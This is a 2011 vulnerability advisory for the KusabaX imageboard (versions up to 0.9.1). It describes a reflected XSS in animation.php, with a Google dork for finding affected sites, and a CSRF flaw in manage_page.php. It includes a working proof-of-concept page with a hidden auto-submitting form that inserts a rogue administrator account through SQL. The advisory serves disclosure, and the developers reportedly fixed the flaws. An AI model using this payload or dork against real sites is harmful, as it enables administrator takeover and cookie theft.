# KusabaX XSS and CSRF Vulnerabilites #
# Product: KusabaX and various Futaba channels clone
# Vendor site: http://kusabax.cultnet.net/
# Affected versions: KusabaX <= 0.9.1
# Product description: an imageboard is a web application written in PHP used in sites
# like 4chan as an anonymous bullettin board based on image sharing.
# Author: Emilio Pinna - ncl 01 _at_ email _dot_ it
# Blog site: http://thissecting.wordpress.com
# Date: 27/04/2011
# Cross Site Scripting in 'animation.php' #
# Vulnerable page: animation.php
# Google dork: allinurl: animation.php board id
File "animation.php" suffer from XSS vulnerabilities in line 47:
<param name="pch_file" value="<?php echo KU_BOARDSPATH . '/' . $_GET['board'] . '/src/' . $_GET['id'] . '.pch'; ?>">
Attackers can exploit these weaknesses to execute arbitrary HTML and script code
in a user's browser session that visit resulting in a cookie stealing and bypass of admin
access controls.
# Arbitrary SQL statements execution through CSRF#
# Vulnerable page: manage_page.php
The vulnerability permit to execute SQL commands through 'SQL query' section of Administrator Panel.
This flaw exists due to failure in the 'manage_page.php' script to verify the source of HTTP request
with anti CRSF tokens or referrer check. This bug flaw was reported in 2010 for older versions
(http://tinyurl.com/5wdrmy6), but never totally fixed. The following example adds an administrator
account with login 'new_admin' and password 'admin' encrypted with 'TMC' as salt.
INSERT INTO staff VALUES (1331, 'new_admin', '6a9685fcb53b90f0ca9a1c72d7fa31d2', 'TMC', 1, NULL, 1303904817, 1303908333)
The attacker must lure a logged user with Administrator privilege to a web page with malicious code similar to the
following PHP script.
#--------- File: manage_page_sql_crsf.html -----------#
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
<form method="post" name="sender" action="http://localhost/kusabax/manage_page.php?action=sql" target="hidden">
<input type="hidden" name="query" value="insert into staff values (1331, 'new_admin', '6a9685fcb53b90f0ca9a1c72d7fa31d2', 'TMC', 1, NULL, 1303904817, 1303908333)">
<script>document.sender.submit(); </script>
# Disclosure:
# 27/04/2011 Reported to KusabaX developers and fixed immediatly with version 0.9.2.